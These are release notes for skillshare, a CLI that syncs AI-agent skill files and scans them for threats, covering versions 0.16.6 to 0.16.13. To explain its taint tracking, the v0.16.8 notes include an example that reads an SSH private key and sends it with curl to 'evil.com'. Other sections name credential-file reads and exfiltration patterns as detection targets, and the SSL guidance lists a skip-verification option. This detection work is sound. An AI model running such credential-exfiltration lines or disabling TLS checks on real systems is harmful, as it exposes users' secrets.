🚀 skillshare v0.16.13 Release Notes

Release date: 2026-03-06

TL;DR

v0.16.13 redesigns the list and audit TUI with grouped layout, adds structured filter tags for precise skill filtering, and supports 3 new AI agent targets:

1. Grouped layout — skills organized by tracked repo with visual separators, compact paths, and repo-name badges
2. Structured filter tags — t:tracked g:security audit filters by type, group, and free text simultaneously
3. 3 new targets — Warp, Purecode AI, Witsy (55+ supported tools)

No breaking changes. Drop-in upgrade from v0.16.12.

TUI Grouped Layout

The problem

When users track multiple repos, the flat skill list becomes hard to navigate. Skills from different repos are visually indistinguishable, and long tracked-repo paths (_runkids-my-skills/security/skill-name) clutter the display. The same issue affects audit results.

Solution

Both skillshare list and skillshare audit TUIs now group skills by origin:

── runkids-my-skills (42) ──────────────
  ✓ security/skill-improver
  ! security/audit-demo-debug-exfil
── standalone (27) ─────────────────────
  ! react-best-practices
  ! skill-creator

• Tracked repos sort first (alphabetically), standalone skills follow
• Within each group, skills sort by severity (audit) or path (list)
• When only one group exists, separators are omitted automatically
• Compact paths strip the repo prefix: _runkids-my-skills/security/skill-name → security/skill-name
• Tracked skills always show a repo-name badge, keeping them identifiable even in filtered views without group headers

Design decisions

• Shared groupItem type — both list and audit TUIs use the same groupItem struct and skipGroupItem navigation. The renderPrefixRow helper renders all list rows (skill and audit) through a single code path.
• Dynamic panel height — audit footer has variable line count (1-2 summary lines depending on threat categories). Panel height is computed from termHeight - auditFooterLines() rather than a hardcoded offset.
• Single-group detection — a single-pass map tracks distinct group keys with early exit at 2. Avoids multiple iterations over the skill list.
• ANSI-aware truncation — truncateANSI delegates to xansi.Truncate which preserves color codes while measuring visual width. The previous approach stripped ANSI, counted runes, and returned plain text — losing all styling.

Structured Filter Tags

The problem

The / filter in list TUI only did free-text fuzzy matching across name, path, and source. Users with 100+ skills couldn't efficiently narrow by type (tracked vs local) or repo origin without scrolling.

Solution

The filter input now supports key:value tags alongside free text:

Usage patterns

# Show only tracked skills
/t:tracked

# Show tracked skills in the security group
/t:tracked g:security

# Find skills from a specific repo containing "audit"
/r:runkids audit

# Combine multiple filters (AND logic)
/t:local g:frontend react

Multiple tags combine with AND logic. Free text is matched against name, path, and source. Unknown tag keys are treated as free text.

New Targets

Three new AI agent targets:

Supported tools: 55+.

Bug Fixes

• Row truncation — long skill names now truncate with … instead of wrapping to multiple lines. Both list and audit TUIs use xansi.Truncate with padding-aware width calculation.
• Audit panel height — items at the bottom of the audit list were hidden behind the footer. Panel height is now dynamically computed from actual footer line count.
• Detail panel deduplication — removed duplicate information (installed date, repo name) that appeared across multiple sections.
• Audit color noise — non-zero severity counts use semantic colors (red/orange/yellow/blue), zero counts are dimmed. Previously all counts had equal visual weight.
• Devcontainer -j flag — the wrapper's wants_machine_output() now recognizes -j in addition to --json, preventing stderr banner noise in machine-readable output.

Changelog

• 9b5429a feat(targets): add Warp, Purecode AI, Witsy targets
• 8ddf886 feat(tui): add grouped layout and dynamic panel height to audit TUI
• 0e7bfea feat(tui): add structured filter tags to list TUI
• 0a0ac2e feat(tui): redesign list panel with grouped layout and compact paths
• a217e40 fix(audit): reduce color noise in CLI and TUI output
• 5ae4c7a fix(tui): improve detail panel readability
• f115ab5 fix(tui): show skill name and group in list detail panel
• c085f10 fix(tui): skip group separators when single group and fix row truncation
• 657b833 fix: suppress devcontainer redirect for -j flag and show tracked badge in filter mode
• 7015aaf refactor(tui): unify duplicated group/render logic between list and audit TUIs

skillshare v0.16.12 Release Notes

Release date: 2026-03-05

TL;DR

v0.16.12 adds structured JSON output to 8 more commands, bringing total --json coverage to all 12 major CLI commands. Every command now has a machine-readable output mode for agent consumption and CI/CD pipelines:

1. 8 new --json commands — sync, install, update, uninstall, collect, target list, status, diff
2. Non-interactive by design — --json on mutating commands implies --force (skips prompts)
3. Clean stdout — TUI, spinners, and progress suppressed; structured data to stdout only

No breaking changes. Drop-in upgrade from v0.16.11.

Structured JSON Output

The problem

AI agents (Claude Code, Codex, Cursor) and CI pipelines need to parse CLI output programmatically. Text output with colors, spinners, and tables is designed for humans — parsing it with grep/regex is brittle and breaks when formatting changes between versions.

Solution

8 commands gain --json support in two phases:

Phase 1 — Mutating commands:

Phase 2 — Read-only commands:

Previously supported (unchanged):

Design decisions

• Per-command JSON schema — each command defines its own output struct (e.g., syncJSONOutput, installJSONOutput). No universal envelope — keeps each schema focused and documented.
• writeJSON() helper — shared function with recursive nil-slice-to-empty-array conversion. Ensures jq never sees null where it expects [].
• --json implies --force for mutating commands — agents can't answer interactive prompts, so JSON mode skips them. This is safe because the caller explicitly opted into machine mode.
• Stderr for progress, stdout for JSON — spinners and progress indicators go to stderr so they don't corrupt the JSON stream. jq piping works cleanly.

Usage patterns

# Agent workflow: install → verify → sync
skillshare install github.com/team/skills --json | jq -e '.skills | length > 0'
skillshare sync --json | jq -e '.errors == 0'

# CI pipeline: check for updates
skillshare check --json | jq '.tracked_repos[] | select(.has_update)'

# Dashboard: get full status
skillshare status --json | jq '{skills: .skills | length, targets: .targets | length}'

Changelog

• b366f61 chore: formatting alignment and changelog jq example fix
• f03ba45 chore: update docs
• 02aa2b2 feat(cli): add --json output to 8 commands (Phase 1+2)
• 5c31332 feat(skill): add --json assertion guidance to cli-e2e-test skill
• 18bfe5f feat(skill): improve built-in skill for v0.16.12
• bcf31d8 fix(audit): show actual active analyzers in status --json output
• 9982c2e fix(cli): clean up --json output code after review
• 6b4a878 fix(cli): ensure --json mode outputs pure JSON to stdout
• 18cd0ec fix(cli): preserve non-zero exit code for --json error paths
• 4b09d2e fix(cli): redirect JSON-mode UI to /dev/null and add status --project --json
• 9a12df0 fix(cli): restore argument validation for status --project mode
• b5430e0 fix(cli): suppress UI output in --json mode for install, diff, uninstall
• d707fc6 fix(cli): suppress stderr progress messages in --json mode
• 1a4de5d fix(cli): use errors.As for jsonSilentError check in main
• 8ddf685 fix(cli): wrap collect/sync JSON errors with jsonSilentError
• 7223ac5 fix(sync): preserve non-json dry-run output stream
• 6ad930f perf(cli): parallelize git dirty checks in status --json
• 0d59f15 refactor(cli): deduplicate JSON output helpers and fix ResolvePolicy semantics
• 4535da1 refactor(cli): return updateResult from single-target update handlers

🛡️ skillshare v0.16.11 Release Notes

Release date: 2026-03-05

TL;DR

v0.16.11 adds supply-chain trust verification, hardcoded secret detection, and web UI streaming — a new metadata analyzer detects publisher impersonation, 10 new rules catch inline API keys and tokens, doctor gains file hash integrity checks, and the web UI streams all long-running operations in real time:

1. Metadata analyzer — detects publisher mismatch (HIGH) and authority language (MEDIUM) in SKILL.md
2. Hardcoded secret detection — 10 new rules detect Google, AWS, GitHub, Slack, OpenAI, Anthropic, Stripe keys, private key blocks, and generic secret assignments
3. Doctor integrity check — verifies file hashes against .skillshare-meta.json
4. Web UI SSE streaming — all long-running operations (audit, update, check, diff) stream results via SSE
5. Virtualized scrolling — audit results and diff items use virtual scrolling for smooth large-dataset performance
6. SSL error guidance — actionable options when git clone fails due to certificate issues

No breaking changes. Drop-in upgrade from v0.16.10.

Supply-Chain Trust Verification

The problem

A skill can claim to be "Official Claude Helper by Anthropic" in its SKILL.md description, but actually be published by an unknown user. The existing audit engine catches code-level threats (injection, exfiltration), but not metadata-level social engineering.

Metadata analyzer

The new metadata analyzer (skill scope) cross-references SKILL.md frontmatter against .skillshare-meta.json:

Rule A: publisher-mismatch (HIGH)

Detects when SKILL.md claims an organization that doesn't match the actual repo owner:

HIGH  publisher-mismatch  skill claims origin "Anthropic" but sourced from "evil-fork"

Supports patterns: from X, by X, made by X, created by X, published by X, maintained by X, and @handle mentions. Substring matches are allowed (e.g., claiming "vercel" when owner is "vercel-labs" passes).

Rule B: authority-language (MEDIUM)

Detects authority words ("official", "verified", "trusted", "authorized", "endorsed", "certified") from unrecognized sources:

MEDIUM  authority-language  skill uses authority language (official, verified) but source is unverified

Well-known organizations (Anthropic, OpenAI, Google, Microsoft, Vercel, etc.) are allowed. Local skills (no repo URL) are skipped.

Both rules are disable-able via audit-rules.yaml:

skillshare audit rules disable publisher-mismatch
skillshare audit rules disable authority-language

# Runs by default with all analyzers
skillshare audit

# Run metadata analyzer only
skillshare audit --analyzer metadata

Skill Integrity Verification (Doctor)

doctor integrity check

skillshare doctor now verifies that tracked skills haven't been tampered with since installation. For skills with .skillshare-meta.json containing file_hashes, doctor computes current SHA-256 hashes and compares:

✓ Skill integrity: 5/6 verified
⚠ _team-repo__api-helper: 1 modified, 1 missing
⚠ Skill integrity: 2 skill(s) unverifiable (no metadata)

Two-phase approach for performance:

1. Phase 1 (cheap): filter to skills that have metadata with file hashes
2. Phase 2 (expensive): compute and compare hashes with spinner

Skills without metadata are reported as "unverifiable" — no false positives.

Web UI SSE Streaming

All operations now stream in real-time

All long-running web dashboard operations use Server-Sent Events (SSE) instead of batch HTTP requests:

Each page shows elapsed time, a progress bar, and results appear as they complete — no more staring at a spinner for 10+ repos.

New SSE endpoints:

• GET /api/audit/stream — streaming audit results
• GET /api/update/stream — streaming skill updates
• GET /api/check/stream — streaming repo checks
• GET /api/diff/stream — streaming target diffs

Virtualized scrolling

Audit results and diff item lists now use react-virtuoso virtual scrolling:

• Audit page: skill cards render on-demand as you scroll (window-level virtualization)
• Sync page diff: targets with 100+ items use a fixed-height virtualized container; smaller lists render directly

Replaces the previous "Show more" pagination buttons for a smoother UX.

SSL Error Guidance

When skillshare install encounters an SSL certificate error (self-signed cert, internal CA), the error message now shows three actionable options:

SSL certificate verification failed — options:
       1. Custom CA bundle: GIT_SSL_CAINFO=/path/to/ca-bundle.crt skillshare install <url>
       2. Skip verification: GIT_SSL_NO_VERIFY=true skillshare install <url>
       3. Use SSH instead: git@<host>:<owner>/<repo>.git

Detection covers: ssl certificate problem, unable to get local issuer certificate, self signed certificate, certificate verify failed, certificate verification failed.

Hardcoded Secret Detection

The problem

GitHub Secret Scanning detected a Google API Key (AIza...) in a skill file, but skillshare's audit engine missed it. The engine detects credential file access (cat ~/.ssh/id_rsa) and env var references (curl $TOKEN), but had zero detection for inline hardcoded secrets — API keys, tokens, and passwords embedded directly in text.

10 new hardcoded-secret rules (HIGH)

All rules are HIGH severity — they block installation at default threshold. Category: credential (same as credential-access family).

skillshare audit                                       # secrets detected automatically
skillshare audit rules --pattern hardcoded-secret      # list all secret rules
skillshare audit rules disable hardcoded-secret-9      # disable generic pattern if noisy

For educational/reference skills that intentionally contain example secrets, downgrade the entire group:

# audit-rules.yaml
rules:
  - pattern: hardcoded-secret
    severity: MEDIUM

Other Improvements

• Cleaner TUI layout — removed detail panel box borders in list/log views for less visual clutter

Upgrade

# Homebrew
brew upgrade skillshare

# Go install
go install github.com/runkids/skillshare/cmd/skillshare@v0.16.11

# Or download from GitHub Releases

Changelog

• 2af44f1 chore(skills): strengthen built-in skill descriptions and content
• 1aa8b56 chore: update readme
• 6730760 feat(audit): add hardcoded secret detection (10 rules)
• ebf2aaf feat(audit): add metadata analyzer for supply-chain trust verification
• ae5708e feat(doctor): add skill integrity verification via file hash comparison
• 272735c feat(install): detect SSL certificate errors and show actionable guidance
• 344b067 feat(ui): add SSE streaming for update, check, and diff pages
• 76c1904 feat(ui): add SSE-based audit streaming and real-time progress
• 7e072c3 feat(ui): replace "Show more" pagination with virtualized scrolling
• 0daafd2 style(tui): remove detail panel box borders for cleaner layout

🚀 skillshare v0.16.10 Release Notes

Release date: 2026-03-04

TL;DR

v0.16.10 introduces sync extras — sync non-skill resources (rules, commands, memory files) across AI tools — and a persistent TUI toggle:

1. sync extras — sync arbitrary directories from ~/.config/skillshare/ to any target path, with per-target symlink/copy/merge modes
2. sync --all — run skill sync and extras sync in one command
3. tui on|off — persistently enable/disable interactive TUI mode
4. TUI fix — detail panel bottom content no longer clipped

No breaking changes. Drop-in upgrade from v0.16.9.

Sync Extras

The problem

Skillshare syncs skills (SKILL.md files), but many users also manage shared rules, commands, or memory files across AI tools. Previously, this required manual symlinks or external scripts.

sync extras subcommand

Configure extras in config.yaml:

extras:
  - name: rules
    targets:
      - path: ~/.claude/rules
      - path: ~/.cursor/rules
        mode: copy
  - name: commands
    targets:
      - path: ~/.claude/commands

Then sync:

skillshare sync extras              # sync all configured extras
skillshare sync extras --dry-run    # preview changes
skillshare sync extras --force      # overwrite existing files

Source directories live alongside your skills source under ~/.config/skillshare/<name>/ (e.g., ~/.config/skillshare/rules/).

Per-target modes

Each extra target supports its own sync mode:

sync --all flag

Run skill sync and extras sync together:

skillshare sync --all    # skills first, then extras

Note: --all is global-mode only. In project mode it shows a warning and is ignored.

TUI Preferences

tui subcommand

Persistently toggle interactive TUI mode:

skillshare tui          # show current setting (on/off/default)
skillshare tui off      # disable TUI globally
skillshare tui on       # re-enable TUI

When TUI is disabled, all commands (list, log, search, audit rules) fall back to plain text output. Equivalent to passing --no-tui on every command, but persistent.

Setting is stored as tui: false in config.yaml. Omitting the key (or deleting it) restores the default (TUI enabled).

Bug Fixes

• TUI detail panel clipping — bottom content in the list view detail panel was being cut off; now renders fully

Documentation

• Added sync extras documentation to the website (docs/commands/sync.md), built-in skill, and README
• Split the monolith audit documentation page into focused sub-pages for easier navigation

Upgrade

# Homebrew
brew upgrade skillshare

# Go install
go install github.com/runkids/skillshare/cmd/skillshare@v0.16.10

# Or download from GitHub Releases

Changelog

• 6caf73f docs(audit): split monolith audit.md into focused pages
• 17b207f feat(cli): add 'sync extras' subcommand and --all flag
• 035c9fe feat(config): add ExtraConfig struct for extras sync
• fbccdb9 feat(sync): add extras sync engine — walk, symlink/copy, prune
• f6c5e1d feat(tui): add persistent TUI toggle via skillshare tui [on|off]
• 1b8940a fix(extras): copy-mode idempotency and display mode label
• 81369f1 fix(tui): prevent detail panel bottom content from being clipped
• 55bc528 refactor(extras): simplify after code review
• 45eaeff refactor(tui): reuse boolPtr, add oplog, eliminate redundant config loads
• bc5f60f style(audit): add vertical spacing between CLI output sections
• 65c7d75 style: fix gofmt alignment in extras_test.go and ui.go
• 671e3c5 test(integration): add sync extras E2E tests

🛡️ skillshare v0.16.9 Release Notes

Release date: 2026-03-03

TL;DR

v0.16.9 is the audit engine overhaul release — rules management, security policy profiles, analyzer pipeline, finding enrichment, and 12+ new detection rules:

1. audit rules subcommand — browse, disable, enable, override severity, reset rules from CLI or interactive TUI
2. Security profiles — --profile strict|default|permissive sets threshold + dedupe in one flag
3. Global deduplication — SHA-256 fingerprint-based finding dedup across all skills (now default)
4. Analyzer pipeline — --analyzer flag to run specific analyzers; findings enriched with ruleId, analyzer, category, confidence, fingerprint
5. Category threat breakdown — summary shows per-category counts (injection, exfiltration, credential, etc.)
6. 12+ new detection rules — interpreter tier (T6), invisible payloads, bidi attacks, DNS exfil, self-propagation, config poisoning, and more
7. Regex prefilters — conservative literal-substring prefilters reduce scan time

No breaking changes. Drop-in upgrade from v0.16.8.

Audit Rules Management

audit rules subcommand

Full lifecycle management for audit rules without editing YAML:

skillshare audit rules                              # interactive TUI browser
skillshare audit rules --format json                 # machine-readable listing
skillshare audit rules --severity HIGH               # filter by severity
skillshare audit rules --pattern prompt-injection     # filter by pattern
skillshare audit rules --disabled                     # show only disabled rules
skillshare audit rules disable <rule-id>             # disable a single rule
skillshare audit rules disable --pattern <pattern>   # disable all rules in a pattern
skillshare audit rules enable <rule-id>              # re-enable a rule
skillshare audit rules severity <rule-id> HIGH       # override severity
skillshare audit rules severity --pattern <p> MEDIUM # override pattern severity
skillshare audit rules reset                         # restore built-in defaults
skillshare audit rules init                          # create starter audit-rules.yaml

Audit Rules TUI

Interactive bubbletea browser with:

• Accordion pattern groups (expand/collapse with Enter)
• Severity tabs: ALL / CRIT / HIGH / MED / LOW / INFO / OFF
• Text filter (/ to search)
• Inline actions: d disable, e enable, s severity override, R reset
• Split layout: left list + right detail panel

Pattern-Level Overrides

audit-rules.yaml now supports pattern-level entries that apply to all rules under a pattern:

rules:
  prompt-injection:
    disabled: true  # disables all prompt-injection-* rules
  credential-access:
    severity: MEDIUM  # downgrades all credential-access-* rules

Security Policy & Deduplication

--profile flag

Preset security profiles that configure threshold + deduplication in one flag:

skillshare audit --profile strict       # blocks on HIGH+, global dedupe
skillshare audit --profile permissive   # blocks on CRITICAL only, per-skill dedupe

--dedupe flag

Control finding deduplication independently:

• global (default) — deduplicates across all skills using SHA-256 fingerprints; keeps highest severity when duplicates exist
• legacy — per-skill deduplication only (v0.16.8 behavior)

skillshare audit --dedupe legacy   # opt out of global dedup

Policy Display

Active policy is now shown in:

• Audit header — profile name, threshold, dedupe mode
• Summary box — "Policy: strict" (colorized by profile)
• TUI footer — inline policy indicator

Analyzer Pipeline

--analyzer flag

Run only specific analyzers (repeatable):

skillshare audit --analyzer static               # regex rules only
skillshare audit --analyzer dataflow              # taint tracking only
skillshare audit --analyzer static --analyzer tier  # combine multiple

Available analyzers: static, dataflow, tier, integrity, structure, cross-skill.

Finding Enrichment

Every finding now carries Phase 2 traceability fields:

These fields appear in JSON, SARIF, and Markdown output formats.

Category Threat Breakdown

Summary now includes a per-category count line across all output channels:

• CLI: Threats: injection:3 credential:1 exfiltration:1 (ANSI colored)
• TUI: Threats: inj:3 cred:1 exfil:1 (lipgloss styled, short names)
• JSON: "byCategory": {"injection": 3, "credential": 1, ...}
• Markdown: Threats column in summary table

Sorted by count (descending), then alphabetically.

New Detection Rules

Interpreter Tier (T6)

New command tier for Turing-complete runtimes:

Findings:

• tier-interpreter (INFO) — interpreter present
• tier-interpreter-network (MEDIUM) — interpreter + network commands
• cross-skill-cred-interpreter (MEDIUM) — credential access in one skill + interpreter in another

Version-suffix stripping: python3.11 → T6:interpreter. env python3 script.py → T6:interpreter (no longer hidden behind env).

Prompt Injection (expanded)

Invisible Payload (new pattern)

Uses dedicated invisible-payload pattern to ensure CRITICAL findings are never suppressed in tutorial contexts.

Hidden Unicode (expanded)

Other New Rules

Table-Driven Credential Access

Credential rules are now generated from a data table covering 30+ sensitive paths × 5 access methods. Descriptive rule IDs: credential-access-ssh-private-key, credential-access-etc-shadow-copy, etc. Supports ~, $HOME, ${HOME} variants. Heuristic catch-all for unknown home dotdirs.

Performance

• Regex prefilters — static analyzer applies conservative literal-substring checks before running regex. Rules with a prefilter field skip the full regex if the literal substring isn't present in the line. Reduces scan time on large skills with many rules.

Bug Fixes

• Regex bypass vulnerabilities — fixed prompt injection rules bypassed by leading whitespace or mixed case; fixed data-exfiltration image exclude allowing .png?stolen_data; fixed dd if=/etc/shadow mislabeled as destructive-commands
• SSH public key false positive — .pub files no longer trigger CRITICAL credential-access findings
• Catch-all regex bypass — heuristic catch-all no longer silenced by known credential paths on the same line
• Structured output ANSI leak — --format json/sarif/markdown no longer leaks cursor codes
• Severity-only merge — editing only severity in audit-rules.yaml no longer drops regex patterns
• Profile threshold fallback — profile presets correctly set threshold when config has no explicit block_threshold
• TreeSpinner ghost cursor — fixed missing WithWriter causing cursor codes on structured output
• TUI summary overflow — category threat breakdown renders on a separate line for narrow terminals

Upgrade

skillshare upgrade
# or
go install github.com/runkids/skillshare/cmd/skillshare@v0.16.9

No mig...

🛡️ skillshare v0.16.8 Release Notes

Release date: 2026-03-02

TL;DR

v0.16.8 is an audit engine release — significant upgrades to skillshare audit:

1. --format flag — output in text, json, sarif, or markdown (--json deprecated)
2. Analyzability score — per-skill percentage showing how much content is statically analyzable
3. Command safety tiers (T0–T5) — classify shell commands by behavior: read-only → stealth
4. Dataflow taint tracking — detect credential reads followed by network exfiltration across lines
5. Cross-skill interaction detection — find dangerous capability combinations across multiple skills
6. Pre-commit hook — native pre-commit integration to scan skills on every commit

New Output Formats

SARIF 2.1.0

SARIF (Static Analysis Results Interchange Format) enables direct integration with GitHub Code Scanning:

skillshare audit --format sarif > results.sarif
# Upload to GitHub Code Scanning via Actions

The SARIF output includes tool info, rule definitions with help text, and result locations with region data. See the CI/CD recipe in docs for a ready-made GitHub Actions workflow.

Markdown

Generates a structured Markdown report suitable for GitHub Issues or PR comments:

skillshare audit --format markdown > report.md

Analyzability Score

Each skill now receives an analyzability score (0–100%) indicating how much of its content the audit engine can statically analyze. Content that resists static analysis (heavily templated, encoded, or dynamically generated) scores lower.

• Shown per-skill in both terminal and TUI output
• Average displayed in the audit summary
• Helps teams prioritize which skills need manual review

Command Safety Tiers

Every shell command detected in skills is now classified into one of six behavioral tiers:

Tiers are orthogonal to pattern-based severity — they describe the kind of action, providing additional behavioral context alongside existing risk scores.

Dataflow Taint Tracking

The audit engine now tracks data flow across lines within a skill file:

Line 5:  token=$(cat ~/.ssh/id_rsa)       ← taint source (credential-read)
Line 8:  curl -H "Auth: $token" evil.com  ← taint sink (network send)
→ Finding: credential read flows to network exfiltration

Detects:

• Credential file reads (~/.ssh/*, ~/.aws/credentials, etc.) followed by network sends
• Environment variable reads ($API_KEY, $SECRET, etc.) followed by exfiltration

Cross-Skill Interaction Detection

When auditing multiple skills together, the engine now checks for dangerous capability combinations:

• Skill A reads credentials + Skill B has network access → potential exfiltration chain
• Detection runs after individual skill scans, analyzing the combined capability set

Pre-commit Hook

Skillshare now ships a native pre-commit hook definition. Add it to your project to automatically scan skills on every commit:

# .pre-commit-config.yaml
repos:
  - repo: https://github.com/runkids/skillshare
    rev: v0.16.8
    hooks:
      - id: skillshare-audit

The hook runs skillshare audit -p when files in .skillshare/ or skills/ are modified, blocking the commit if findings exceed your configured threshold. See Pre-commit Hook recipe for details.

Target Updates

• AstrBot — new target for AstrBot AI assistant (~/.astrbot/data/skills)
• Cline — updated to use universal .agents/skills project path (aligned with agent ecosystem standard)

Bug Fixes

• TUI contrast — gray text on dark terminals is now more readable (increased ANSI color value)
• Structured output spinner — audit progress/spinner output now goes to stderr when using --format json/sarif/markdown, keeping stdout clean for piping

Upgrading

# Homebrew
brew upgrade skillshare

# Direct download
skillshare upgrade

# Or download from GitHub Releases
# https://github.com/runkids/skillshare/releases/tag/v0.16.8

Changelog

• 3af76ff docs(audit): add SARIF output format and --format flag documentation
• 85508dc docs(audit): add analyzability score section and missing rule IDs
• c298e2a docs(blog): update vercel/skills comparison with current facts
• 8ef6f11 docs(recipes): add SARIF GitHub Actions workflow to CI/CD recipe
• 11668b8 feat(audit): add --format flag with sarif/json/text + deprecate --json
• 043a47e feat(audit): add SARIF 2.1.0 conversion (internal/audit/sarif.go)
• 8e83495 feat(audit): add analyzability score and pre-commit hook
• b6652f1 feat(audit): add command safety tiering (T0–T5) for behavioral classification
• 87268d3 feat(audit): add cross-skill interaction detection
• 50e5e11 feat(audit): add dataflow taint tracking for cross-line exfiltration
• 89c3586 feat(audit): add markdown output format and improve terminal layout
• 28dacd1 feat(audit): expand TUI filter to search risk, status, severity, patterns, and files
• 71bf096 feat(audit): show analyzability score in TUI detail panel and summary
• 0712368 feat(devc): add make devc shortcut to enter devcontainer from terminal
• 3bc9ad7 feat(targets): add AstrBot, update Cline to universal .agents/skills
• 2fe9052 fix(audit): omit SARIF region for line-0 findings and add cross-skill to API
• 2320630 fix(audit): prevent stdout pollution in structured output formats
• afb8951 fix(audit): show spinner/progress on stderr for structured output formats
• 787c46c fix(tui): improve gray text contrast on dark terminals
• ca5a036 perf(audit): rewrite cross-skill analysis from O(N²) to O(N)

🔗 skillshare v0.16.7 Release Notes

Release date: 2026-03-02

TL;DR

v0.16.7 is a dotfiles manager compatibility release:

1. External symlinks preserved — sync no longer breaks target symlinks created by stow, chezmoi, yadm, etc.
2. Symlinked source directories across all commands — ~/.config/skillshare/skills/ can be a symlink (even chained) and all commands (sync, update, uninstall, list, status, collect, install, diff) discover skills correctly
3. Status/collect aware — status and collect follow external target symlinks instead of reporting conflicts or skipping them
4. Group containment guard — uninstall --group and update --group reject groups that symlink outside the source tree

The Problem

Dotfiles managers (GNU Stow, chezmoi, yadm, bare-git) commonly manage AI tool config directories through symlinks:

~/.claude/skills/ → ~/dotfiles/claude-skills/     # stow-managed
~/.config/skillshare/skills/ → ~/dotfiles/ss/     # source also symlinked

Before v0.16.7, skillshare would:

• Delete the ~/.claude/skills/ symlink when converting from symlink→merge mode (breaking the dotfiles manager setup)
• Fail to discover skills when the source directory was a symlink (affected update, uninstall, reconcile, and server handlers — not just sync)
• Report "conflict" for targets that were external symlinks
• Skip scanning external target symlinks in collect

Root cause: filepath.Walk vs symlinked roots

filepath.Walk and filepath.WalkDir use os.Lstat on the root, which does not follow symlinks. If root is a symlink, info.IsDir() returns false and the walk callback never enters it. This affected 10+ callsites beyond sync:

• internal/config/reconcile.go — ReconcileGlobalSkills
• internal/config/project_reconcile.go — ReconcileProjectSkills
• internal/install/install_queries.go — getUpdatableSkillsImpl, FindRepoInstalls, getTrackedReposImpl
• cmd/skillshare/update.go — cmdUpdate --all
• cmd/skillshare/update_resolve.go — resolveGroupUpdatable
• cmd/skillshare/update_project.go — updateAllProjectSkills
• cmd/skillshare/uninstall.go — resolveGroupSkills, resolveNestedSkillDir, countGroupSkills
• internal/server/handler_update.go — getServerUpdatableSkills

os.ReadDir does follow symlinked roots (uses os.Open), so callsites using ReadDir (doctor, audit) were unaffected.

Symlink Sync Decision Flow

The core fix for target symlinks is isSymlinkToSource() — before removing a target symlink, sync checks whether it points to the skillshare source directory:

Target is a symlink?
├── YES → Points to source directory?
│   ├── YES → Skillshare's own symlink-mode link
│   │         → Remove it (converting to merge/copy mode)
│   └── NO  → External symlink (dotfiles manager, etc.)
│             → Preserve it, sync INTO the resolved directory
└── NO  → Regular directory
          → Sync normally (create skill symlinks inside)

Source Directory Resolution

utils.ResolveSymlink() (extracted from sync.go's local resolveWalkRoot()) calls filepath.EvalSymlinks() on the path before walking:

Source: ~/.config/skillshare/skills/  (symlink)
  → ~/dotfiles/ss/                   (resolved)
    → Walk resolved path for SKILL.md files
    → Compute RelPath relative to resolved root
    → Store SourcePath using original symlink path (for display)

This also handles chained symlinks: link2 → link1 → real_dir.

Group Operation Containment Guard

uninstall --group and update --group now verify that the resolved group path stays within the source tree:

Group dir is a symlink?
├── Resolved path inside source? → Proceed normally
└── Resolved path outside source? → Reject with error:
    "group 'evil-group' resolves outside source directory"

This prevents a crafted symlink (e.g., skills/evil-group → /important/data) from causing unintended deletions or updates outside the source tree.

What Changed

Testing

• Unit tests: internal/sync/symlinked_dir_test.go (560 lines) — covers symlinked source, symlinked target, double symlink, chained symlinks, external symlink preservation, copy mode, merge mode
• Integration tests: tests/integration/sync_symlinked_dir_test.go (378 lines) — end-to-end CLI tests with testutil.Sandbox, including containment guard rejection tests
• E2E runbook: ai_docs/tests/symlinked_dir_sync_runbook.md — 20-step manual validation for devcontainer covering sync, update, uninstall, collect, reconcile, and containment guard scenarios

Upgrading

# Homebrew
brew upgrade skillshare

# Direct download
skillshare upgrade

# Or download from GitHub Releases
# https://github.com/runkids/skillshare/releases/tag/v0.16.7

Changelog

• b8b48aa fix(symlink): resolve symlinked source/target dirs across all Walk callsites
• abe64cc fix(sync): preserve external symlinks during sync (dotfiles manager support)
• 70a8e79 fix(sync): preserve external symlinks in merge/copy mode conversions
• 8519ebe fix(upgrade): clear prompt lines to preserve tree layout

🔍 skillshare v0.16.6 Release Notes

Release date: 2026-03-02

TL;DR

v0.16.6 is a diff enhancement and TUI expansion release:

1. diff interactive TUI — split-panel bubbletea interface with fuzzy filter and file-level detail
2. diff --patch / --stat — unified text diffs and per-file change summaries
3. Glob pattern matching — install, update, uninstall accept *, ?, [...] patterns
4. trash TUI — multi-select interactive list with restore/delete/empty and SKILL.md preview
5. restore TUI — two-phase target picker → version list with detail panel
6. Homebrew-aware version check — no more false "update available" for Homebrew users
7. Built-in devcontainer skill — teaches AI assistants to use the devcontainer

What's New

1) diff Interactive TUI

skillshare diff now launches a full-screen bubbletea TUI by default:

• Left panel: Target list with status icons (✓ synced, ! drifted, ✗ missing)
• Right panel: Categorized file-level diffs for the selected target
• Controls: / to filter, Ctrl+d/u to scroll details, q to quit
• Falls back to plain text on non-TTY or with --no-tui

2) diff --patch and --stat

Two new flags for non-interactive inspection:

# Show unified text diff for every changed file
skillshare diff --patch

# Show per-file change summary (added/removed line counts)
skillshare diff --stat

Both flags imply --no-tui and print directly to stdout.

3) diff File-Level Detail

Diff entries now go beyond target-level to show individual file changes:

• Per-file categorization: added (+), removed (−), modified (≠), renamed (→)
• Source paths and modification times
• Statistics summary line at the end of each run (e.g., 3 added, 1 modified, 2 removed)

4) Glob Pattern Matching

install, update, and uninstall now support glob patterns in skill name arguments:

# Install only matching skills from a repo
skillshare install runkids/my-skills -s "core-*"

# Update all team skills
skillshare update "team-*"

# Uninstall by pattern
skillshare uninstall "old-??"

Matching is case-insensitive. Supports *, ?, and [...] character classes.

5) trash Interactive TUI

skillshare trash now launches an interactive TUI:

• Multi-select with checkboxes for batch operations
• Fuzzy filter to search through trashed skills
• Inline actions: restore, delete, empty all
• Detail panel shows SKILL.md preview (first 15 lines) for content inspection

6) restore Interactive TUI

skillshare restore (with no arguments) launches a two-phase interactive flow:

1. Phase 1: Pick a target from targets with available backups
2. Phase 2: Select a backup version with left-right split panel

The detail panel shows skill diffs and descriptions to help decide which version to restore. Also adds --help flag and a delete-backup action from within the TUI.

7) backup Improvements

• Lists available backup versions per target
• Correctly follows top-level symlinks in merge-mode targets (previously produced empty backups)

8) Homebrew-Aware Version Check

Homebrew formula updates often lag GitHub Releases by hours or days. Previously, Homebrew users would see "update available" when brew upgrade said they were already current.

Now skillshare detects the install method from the executable path:

• Homebrew installs: queries brew info --json=v2 for the latest version
• Direct downloads: continues using the GitHub Release API
• doctor and post-command update checks show the correct upgrade command

9) Devcontainer Skill

New built-in skill (devcontainer) that teaches AI assistants:

• When to run commands inside the devcontainer vs. on the host
• How to use docker exec for isolated testing
• Credential-helper management for test isolation
• Web UI debugging inside the container

10) UX Polish

• All destructive action confirmations (delete, empty, uninstall) now render in red text across trash, restore, and list TUIs for visual safety

Bug Fixes

